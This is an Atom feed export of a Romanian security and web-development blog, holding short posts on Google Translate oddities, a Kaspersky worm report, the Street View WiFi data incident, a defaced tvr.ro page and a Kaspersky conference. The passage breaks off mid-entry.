<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-2981702222826239579</id><updated>2011-12-14T09:26:18.393+02:00</updated><category term='obscuritate'/><category term='blog launch'/><category term='vulnerabilitati'/><category term='date personale'/><category term='yahoo'/><category term='baze de date'/><category term='domo vulnerabil'/><category term='virusi'/><category term='javascript'/><category term='translate'/><category term='ratb'/><category term='mysql'/><category term='exemplu'/><category term='joomla'/><category term='web'/><category term='php'/><category term='problema cu float'/><category term='viitorul banilor'/><category term='webbunch'/><category term='iframe attack'/><category term='conferinta'/><category term='sql injection'/><category term='oracle'/><category term='kasperski'/><category term='investitii IT'/><category term='hacked'/><category term='paypal'/><category term='evz.ro'/><category term='greseala'/><category term='emag hacked'/><category term='amazon'/><category term='internet'/><category term='drupal'/><category term='soft'/><category term='server'/><category term='register global'/><category term='microsoft'/><category term='xss'/><category term='autosuggestion'/><category term='post vs get'/><category term='exploit'/><category term='gecad'/><category term='securitate'/><category term='google'/><title type='text'>Web Bunch - Diverse articole despre securitate, vulnerabilitati PHP, MySql</title><subtitle type='html'>securitate, vulnerabilitati, PHP, MySql, Javascript hacks, cu exemple SQL Injections, intamplari ciudate</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://webbunch.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2981702222826239579/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://webbunch.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>Sorin Porumboiu</name><uri>http://www.blogger.com/profile/06211971910067219891</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>25</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-2981702222826239579.post-1687212930756212899</id><published>2010-12-21T23:13:00.002+02:00</published><updated>2010-12-21T23:16:23.777+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='joomla'/><category scheme='http://www.blogger.com/atom/ns#' term='drupal'/><title type='text'>Google Joomla! Drupal..</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_TV1FqnjFHCk/TREYwCMKsGI/AAAAAAAABBQ/PBE-bqKdSp4/s1600/joomla%2521.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 420px;" src="http://2.bp.blogspot.com/_TV1FqnjFHCk/TREYwCMKsGI/AAAAAAAABBQ/PBE-bqKdSp4/s320/joomla%2521.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5553247029025222754" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2981702222826239579-1687212930756212899?l=webbunch.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://webbunch.blogspot.com/feeds/1687212930756212899/comments/default' title='Postare comentarii'/><link rel='replies' type='text/html' href='http://webbunch.blogspot.com/2010/12/google-joomla-drupal.html#comment-form' title='1 comentarii'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2981702222826239579/posts/default/1687212930756212899'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2981702222826239579/posts/default/1687212930756212899'/><link rel='alternate' type='text/html' href='http://webbunch.blogspot.com/2010/12/google-joomla-drupal.html' title='Google Joomla! Drupal..'/><author><name>Sorin Porumboiu</name><uri>http://www.blogger.com/profile/06211971910067219891</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_TV1FqnjFHCk/TREYwCMKsGI/AAAAAAAABBQ/PBE-bqKdSp4/s72-c/joomla%2521.jpg' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2981702222826239579.post-1510845559088834286</id><published>2010-09-21T17:08:00.001+03:00</published><updated>2010-09-21T17:09:26.544+03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='google'/><category scheme='http://www.blogger.com/atom/ns#' term='translate'/><title type='text'>crimp PIN tradus de Google</title><content type='html'>Romana -&gt; Engleza&lt;br /&gt;crimp PIN = creţ PIN&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2981702222826239579-1510845559088834286?l=webbunch.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://webbunch.blogspot.com/feeds/1510845559088834286/comments/default' title='Postare comentarii'/><link rel='replies' type='text/html' href='http://webbunch.blogspot.com/2010/09/crimp-pin-tradus-de-google.html#comment-form' title='1 comentarii'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2981702222826239579/posts/default/1510845559088834286'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2981702222826239579/posts/default/1510845559088834286'/><link rel='alternate' type='text/html' href='http://webbunch.blogspot.com/2010/09/crimp-pin-tradus-de-google.html' title='crimp PIN tradus de Google'/><author><name>Sorin Porumboiu</name><uri>http://www.blogger.com/profile/06211971910067219891</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2981702222826239579.post-9071453468789903421</id><published>2010-09-06T13:03:00.002+03:00</published><updated>2010-09-06T13:04:22.579+03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='autosuggestion'/><category scheme='http://www.blogger.com/atom/ns#' term='google'/><title type='text'>Is it wrong google ?</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_TV1FqnjFHCk/TIS8l2SkzuI/AAAAAAAAAZU/U0P5k1aY_KE/s1600/google_is_it_wrong.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 260px;" src="http://2.bp.blogspot.com/_TV1FqnjFHCk/TIS8l2SkzuI/AAAAAAAAAZU/U0P5k1aY_KE/s320/google_is_it_wrong.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5513739202222935778" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2981702222826239579-9071453468789903421?l=webbunch.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://webbunch.blogspot.com/feeds/9071453468789903421/comments/default' title='Postare comentarii'/><link rel='replies' type='text/html' href='http://webbunch.blogspot.com/2010/09/is-it-wrong-google.html#comment-form' title='1 comentarii'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2981702222826239579/posts/default/9071453468789903421'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2981702222826239579/posts/default/9071453468789903421'/><link rel='alternate' type='text/html' href='http://webbunch.blogspot.com/2010/09/is-it-wrong-google.html' title='Is it wrong google ?'/><author><name>Sorin Porumboiu</name><uri>http://www.blogger.com/profile/06211971910067219891</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_TV1FqnjFHCk/TIS8l2SkzuI/AAAAAAAAAZU/U0P5k1aY_KE/s72-c/google_is_it_wrong.JPG' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2981702222826239579.post-6160780108359080947</id><published>2010-08-31T14:00:00.000+03:00</published><updated>2010-08-31T14:01:47.157+03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='virusi'/><category scheme='http://www.blogger.com/atom/ns#' term='securitate'/><category scheme='http://www.blogger.com/atom/ns#' term='kasperski'/><title type='text'>Utilizatorii de Yahoo! Messenger şi Google Talk, ameninţaţi de un nou vierme</title><content type='html'>Kaspersky Lab a identificat o nouă tipologie (familie) de viermi care se răspândesc prin intermediul unor numeroase programe de tip mesagerie instant (IM) şi transmit text în foarte multe limbi.&lt;br /&gt;&lt;br /&gt;Experţii Kaspersky Lab au descoperit până acum patru versiuni ale acestui vierme, a cărui familie a fost denumită IM-Worm.Win32.Zeroll. Aceştia sunt neobişnuiţi prin faptul că transmit text în foarte multe limbi şi se propagă simultan prin clienţi de IM, precum Yahoo! Messenger, Skype, ICQ, Windows Live Messenger, Paltalk Messenger, Google Talk şi XFire, special folosit de cei care se joacă online.  &lt;br /&gt;&lt;br /&gt;Imediat ce pătrunde în computer, acesta caută lista de contacte din programul IM şi se autotransmite către toate adresele pe care le găseşte. Infecţia se produce în momentul în care utilizatorul accesează un link dintr-un mesaj instant primit, despre care crede că îi va afişa o fotografie interesantă. În locul fotografiei, utilizatorul este direcţionat către un fişier infectat care se descarcă automat în sistem.&lt;br /&gt;&lt;br /&gt;Cele mai mult infecţii au fost înregistrate în Mexic&lt;br /&gt;&lt;br /&gt;Capacitatea de a trimite mesaje compuse în multe limbi diferenţiază aceşti viermi de majoritatea celor transmişi prin IM. IM-Worm.Win32.Zeroll foloseşte 13 limbi diferite, inclusiv engleza, germana, spaniola şi portugheza, lansând mesaje pe care utilizatorii din aceste ţări le înţeleg. La momentul de faţă, cele mai multe infecţii s-au înregistrat în Mexic, Brazilia, Peru şi Statele Unite ale Americii, dar au fost identificate cazuri şi în Africa, India sau ţările europene, cu preponderenţă în Spania.&lt;br /&gt;&lt;br /&gt;IM-Worm.Win32.Zeroll are şi funcţionalitate de backdoor, adică poate prelua controlul asupra unui computer, fără ca utilizatorul să ştie acest lucru. După ce intră în sistem, viermele contactează un centru (server) de comandă şi control, iar după ce primeşte comenzile prin IRC începe să descarce în sistem alte programe periculoase. Interesant este faptul că acest vierme se conectează la diferite canale IRC, în funcţie de ţară şi de programul de mesagerie instant existent pe computerul infectat. Acest lucru este avantajos pentru hackeri, deoarece pot controla şi clasifica sistemele infectate în funcţie de ţară şi de clientul de mesagerie instant folosit, permiţând apoi trasmiterea de comenzi personalizate, utile atunci când se lansează mesaje spam care ţintesc un anumit public.&lt;br /&gt;&lt;br /&gt;„Se pare că infractorii cibernetici care au creat acest vierme sunt încă la început”, spune Dmitry Bestuzhev, Regional Expert Kaspersky Lab Latin America. „Aceştia caută să infecteze cât mai multe computere pentru a obţine oferte din partea altor reţele de infractori care doresc să le folosească pentru activităţi ca pay-per-install, spam şi multe altele”, încheie acesta.&lt;br /&gt;&lt;br /&gt;Toţi utilizatorii produselor de securitate Kaspersky Lab sunt protejaţi împotriva noilor viermi care se propagă prin intermediul programelor de mesagerie instant.&lt;br /&gt;&lt;br /&gt;SURSA: Kaspersky&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2981702222826239579-6160780108359080947?l=webbunch.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://webbunch.blogspot.com/feeds/6160780108359080947/comments/default' title='Postare comentarii'/><link rel='replies' type='text/html' href='http://webbunch.blogspot.com/2010/08/utilizatorii-de-yahoo-messenger-si.html#comment-form' title='0 comentarii'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2981702222826239579/posts/default/6160780108359080947'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2981702222826239579/posts/default/6160780108359080947'/><link rel='alternate' type='text/html' href='http://webbunch.blogspot.com/2010/08/utilizatorii-de-yahoo-messenger-si.html' title='Utilizatorii de Yahoo! Messenger şi Google Talk, ameninţaţi de un nou vierme'/><author><name>Sorin Porumboiu</name><uri>http://www.blogger.com/profile/06211971910067219891</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2981702222826239579.post-3438851491609066159</id><published>2010-05-20T12:04:00.002+03:00</published><updated>2010-05-20T12:05:03.767+03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='date personale'/><category scheme='http://www.blogger.com/atom/ns#' term='google'/><category scheme='http://www.blogger.com/atom/ns#' term='greseala'/><title type='text'>Google a adunat „din greşeală“ date personale ale utilizatorilor români de WiFi</title><content type='html'>Google a admis că maşinile utilizate pentru serviciul de cartografiere Street View au colectat din greşeală date personale trimise de utilizatori ai unor reţele wiveless fidelity nesecurizate, scrie AFP, citată de HotNews.ro. România este pe lista celor 30 de ţări unde maşinile companiei au colectat date pentru Street View, iar Google şi-a cerut scuze şi spune că de acum va avea grijă ca astfel de date să nu mai fie înregistrate. E posibil ca Google să fi colectat informaţii legate de e-mail-uri, dar şi de site-urile vizitate de unii utilizatori.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Scandalul a izbucnit în Germania, unde autorităţile au cerut un audit pentru datele ce sunt colectate de maşinile care fac poze pentru serviciul Street View, ce oferă imagini panoramice 360 de grade la nivel de stradă. Nu se ştie exact ce date confidenţiale au fost strânse de maşinile Street View, însă se pare că este vorba de unele e-mail-uri, fotografii, dar posibil şi date despre ce site-uri au vizitat unii utilizatori. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Google vrea să liniştească opinia publică şi a ţinut să precizeze că nu a colectat decât 600 GB de date personale, cam cât un hard-disk standard. Compania spune că va avea grijă ca datele colectate în fiecare ţară să fie şterse şi asigură publicul că nicio informaţie colectată nu a fost folosită la vreun produs Google. Compania a mai adăugat că datele personale colectate reprezintă doar frânturi de comunicare deoarece maşinile se aflau în mers, reţelele WiFi de la care erau strânse informaţii schimbându-se des.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2981702222826239579-3438851491609066159?l=webbunch.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://webbunch.blogspot.com/feeds/3438851491609066159/comments/default' title='Postare comentarii'/><link rel='replies' type='text/html' href='http://webbunch.blogspot.com/2010/05/google-adunat-din-greseala-date.html#comment-form' title='0 comentarii'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2981702222826239579/posts/default/3438851491609066159'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2981702222826239579/posts/default/3438851491609066159'/><link rel='alternate' type='text/html' href='http://webbunch.blogspot.com/2010/05/google-adunat-din-greseala-date.html' title='Google a adunat „din greşeală“ date personale ale utilizatorilor români de WiFi'/><author><name>Sorin Porumboiu</name><uri>http://www.blogger.com/profile/06211971910067219891</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2981702222826239579.post-3040472138615988693</id><published>2010-03-19T16:51:00.003+02:00</published><updated>2010-03-19T16:52:49.325+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='google'/><title type='text'>Sugerati o traducere mai buna?..</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_TV1FqnjFHCk/S6OPi970vZI/AAAAAAAAAX8/04pjHNr_Ry0/s1600-h/traducere_google.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 220px;" src="http://1.bp.blogspot.com/_TV1FqnjFHCk/S6OPi970vZI/AAAAAAAAAX8/04pjHNr_Ry0/s320/traducere_google.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5450357804952239506" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Google Translate rescrie alfabetul! De-asta nu traduce 100% corect. Foloseste alt alfabet!!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2981702222826239579-3040472138615988693?l=webbunch.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://webbunch.blogspot.com/feeds/3040472138615988693/comments/default' title='Postare comentarii'/><link rel='replies' type='text/html' href='http://webbunch.blogspot.com/2010/03/sugerati-o-traducere-mai-buna.html#comment-form' title='3 comentarii'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2981702222826239579/posts/default/3040472138615988693'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2981702222826239579/posts/default/3040472138615988693'/><link rel='alternate' type='text/html' href='http://webbunch.blogspot.com/2010/03/sugerati-o-traducere-mai-buna.html' title='Sugerati o traducere mai buna?..'/><author><name>Sorin Porumboiu</name><uri>http://www.blogger.com/profile/06211971910067219891</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_TV1FqnjFHCk/S6OPi970vZI/AAAAAAAAAX8/04pjHNr_Ry0/s72-c/traducere_google.JPG' height='72' width='72'/><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2981702222826239579.post-4895008943128084499</id><published>2010-01-11T13:14:00.004+02:00</published><updated>2010-01-11T13:20:03.472+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='mysql'/><category scheme='http://www.blogger.com/atom/ns#' term='evz.ro'/><title type='text'>EVZ.ro server limits?..</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_TV1FqnjFHCk/S0sIy9w-I_I/AAAAAAAAAW0/HImjjuYGP7s/s1600-h/evz.ro-server.bmp"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 128px;" src="http://3.bp.blogspot.com/_TV1FqnjFHCk/S0sIy9w-I_I/AAAAAAAAAW0/HImjjuYGP7s/s320/evz.ro-server.bmp" border="0" alt=""id="BLOGGER_PHOTO_ID_5425439847764337650" /&gt;&lt;/a&gt;&lt;br /&gt;Sunt curios daca a fost vreun articol care a dus la caderea serverului MySQL evz.ro astazi 11.01.2010. Cate "megalioane" de cereri MySQL sa fi dus la asta?&lt;br /&gt;Oricum .. am o presimtire ca folosesc o tabela "settings".&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2981702222826239579-4895008943128084499?l=webbunch.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://webbunch.blogspot.com/feeds/4895008943128084499/comments/default' title='Postare comentarii'/><link rel='replies' type='text/html' href='http://webbunch.blogspot.com/2010/01/evzro-server-limits.html#comment-form' title='0 comentarii'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2981702222826239579/posts/default/4895008943128084499'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2981702222826239579/posts/default/4895008943128084499'/><link rel='alternate' type='text/html' href='http://webbunch.blogspot.com/2010/01/evzro-server-limits.html' title='EVZ.ro server limits?..'/><author><name>Sorin Porumboiu</name><uri>http://www.blogger.com/profile/06211971910067219891</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_TV1FqnjFHCk/S0sIy9w-I_I/AAAAAAAAAW0/HImjjuYGP7s/s72-c/evz.ro-server.bmp' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2981702222826239579.post-1888870559341406190</id><published>2009-12-15T09:34:00.002+02:00</published><updated>2009-12-15T09:36:29.384+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='investitii IT'/><category scheme='http://www.blogger.com/atom/ns#' term='soft'/><title type='text'>Probass cumparat de o companie poloneza</title><content type='html'>Compania poloneza IT Asseco South Eastern Europe (SEE) a achizitionat integral furnizorul roman de solutii IT Professional Bank Systems &amp; Software (Probass), dupa ce a platit 7,7 milioane de euro pentru 60% din capitalul firmei si a preluat restul actiunilor printr-un schimb de titluri. Compania poloneza, care a mai preluat in 2007 firmele locale Fiba Software si Net Consulting, anuntase in urma cu o luna ca are aproape 30 mil. euro pentru achizitii si ca studiaza oportunitatile din Romania.&lt;br /&gt;&lt;br /&gt;"Ne uitam la firme cu afaceri repetitive, care au expertiza si ai caror manageri nu vor sa plece din companie odata cu vanzarea.&lt;br /&gt;&lt;br /&gt;Site:www.probass.ro/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2981702222826239579-1888870559341406190?l=webbunch.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://webbunch.blogspot.com/feeds/1888870559341406190/comments/default' title='Postare comentarii'/><link rel='replies' type='text/html' href='http://webbunch.blogspot.com/2009/12/probass-cumparat-de-o-companie-poloneza.html#comment-form' title='0 comentarii'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2981702222826239579/posts/default/1888870559341406190'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2981702222826239579/posts/default/1888870559341406190'/><link rel='alternate' type='text/html' href='http://webbunch.blogspot.com/2009/12/probass-cumparat-de-o-companie-poloneza.html' title='Probass cumparat de o companie poloneza'/><author><name>Sorin Porumboiu</name><uri>http://www.blogger.com/profile/06211971910067219891</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2981702222826239579.post-1752078190138550172</id><published>2009-11-12T17:19:00.003+02:00</published><updated>2009-11-12T17:23:06.531+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='vulnerabilitati'/><category scheme='http://www.blogger.com/atom/ns#' term='securitate'/><title type='text'>Tvr.ro Hacked !!</title><content type='html'>La cate investitii guvernamentale s-au facut in site ul asta, se pare ca are si "mici" vulnerabilitati.&lt;br /&gt;La un moment dat intrand pe tvr.ro dau de :&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_TV1FqnjFHCk/SvwoM2Rn9pI/AAAAAAAAAUw/RTxyEnzh_i0/s1600-h/tvr.rop.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 295px;" src="http://1.bp.blogspot.com/_TV1FqnjFHCk/SvwoM2Rn9pI/AAAAAAAAAUw/RTxyEnzh_i0/s320/tvr.rop.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5403237854130730642" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2981702222826239579-1752078190138550172?l=webbunch.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://webbunch.blogspot.com/feeds/1752078190138550172/comments/default' title='Postare comentarii'/><link rel='replies' type='text/html' href='http://webbunch.blogspot.com/2009/11/tvrro-hacked.html#comment-form' title='0 comentarii'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2981702222826239579/posts/default/1752078190138550172'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2981702222826239579/posts/default/1752078190138550172'/><link rel='alternate' type='text/html' href='http://webbunch.blogspot.com/2009/11/tvrro-hacked.html' title='Tvr.ro Hacked !!'/><author><name>Sorin Porumboiu</name><uri>http://www.blogger.com/profile/06211971910067219891</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_TV1FqnjFHCk/SvwoM2Rn9pI/AAAAAAAAAUw/RTxyEnzh_i0/s72-c/tvr.rop.JPG' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2981702222826239579.post-750563421650307685</id><published>2009-10-02T06:08:00.003+03:00</published><updated>2009-10-02T06:12:59.798+03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='viitorul banilor'/><category scheme='http://www.blogger.com/atom/ns#' term='paypal'/><title type='text'>Viitorul banilor cu PayPal</title><content type='html'>&lt;object width="390" height="240"&gt;&lt;param name="movie" value="http://www.youtube.com/v/rgT7gGciQrg&amp;hl=en&amp;fs=1&amp;"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/rgT7gGciQrg&amp;hl=en&amp;fs=1&amp;" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="390" height="240"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;Imagineaza-ti! Sa poti cumpara seminte sau sa dai bani la lautari cu PayPal!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2981702222826239579-750563421650307685?l=webbunch.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://webbunch.blogspot.com/feeds/750563421650307685/comments/default' title='Postare comentarii'/><link rel='replies' type='text/html' href='http://webbunch.blogspot.com/2009/10/viitorul-banilor-cu-paypal.html#comment-form' title='0 comentarii'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2981702222826239579/posts/default/750563421650307685'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2981702222826239579/posts/default/750563421650307685'/><link rel='alternate' type='text/html' href='http://webbunch.blogspot.com/2009/10/viitorul-banilor-cu-paypal.html' title='Viitorul banilor cu PayPal'/><author><name>Sorin Porumboiu</name><uri>http://www.blogger.com/profile/06211971910067219891</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2981702222826239579.post-3675258565400159271</id><published>2009-09-22T15:14:00.003+03:00</published><updated>2009-09-22T18:34:06.928+03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='conferinta'/><category scheme='http://www.blogger.com/atom/ns#' term='vulnerabilitati'/><category scheme='http://www.blogger.com/atom/ns#' term='gecad'/><category scheme='http://www.blogger.com/atom/ns#' term='securitate'/><category scheme='http://www.blogger.com/atom/ns#' term='kasperski'/><title type='text'>Kasperski si Gecad la conferinta in Bucuresti</title><content type='html'>Conferinta de conferinta, lume buna, mai tot stafful de la Gecad, jurnalisti,&lt;br /&gt;atmosfera prietenoasa ce sa mai..&lt;br /&gt;Securitatea globala a fost tema principala si nu prea s-au abatut de la subiect.&lt;br /&gt;&lt;br /&gt;Ideile lui Eugene Karsperski se invart in jurul centralizarii securitatii si mai ales a implicarii guvernamentale in criminalitatea cibernetica. Evident, discursuri utopice despre ce se va intampla in 10 ani poate, acum sugerand cu tenta umoristica :&lt;br /&gt;"Buy more antivirus software " :D&lt;br /&gt;&lt;br /&gt;Scopul unui Interpol al Internetului ar fi diminuarea ratei de criminalitate si nu de a o elimina complet pentru ca nici nu crede ca s-ar putea eradica de tot.&lt;br /&gt;&lt;br /&gt;O identificare mai clara a utilizatorului de internet poate fi una din solutiile &lt;br /&gt;gasirii potentialilor rau-facatori "virtuali" deoarece, cum a si zis, datele userului de internet nu contin nimic despre tara in care se afla si politiile nationale nu pot coopera intre ele.&lt;br /&gt; &lt;br /&gt;De asemenea, a sustinut si faptul ca a nu fi in calitatea de victima software sau de orice fel implica si atentia persoanei in cauza fapt pe care securitatea externa nu il poate garanta si nici anticipa. Exemplu lui a fost ca daca stai continuu pe site uri cu continut pornografic si abia intr-una din dati ai fost infectat cu vreun virus informatic ... atunci..nu Kasperski e de vina cu alte cuvinte.&lt;br /&gt;&lt;br /&gt;Intrebat de colegul meu despre ce efect va avea aceasta orientare asupra softurilor open source, GPL , free in orice caz, a raspuns diplomatic ca aceasta n-ar fi o masura de culoare economica si nu crede ca va avea un efect negativ, afirmand ca ii place Unix ul in general.&lt;br /&gt;(ba chiar tinand un moment in discurs despre Securitate vs Flexibilitate si MS Windows a fost unu din exemplele de .. flexibilitate )&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2981702222826239579-3675258565400159271?l=webbunch.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' 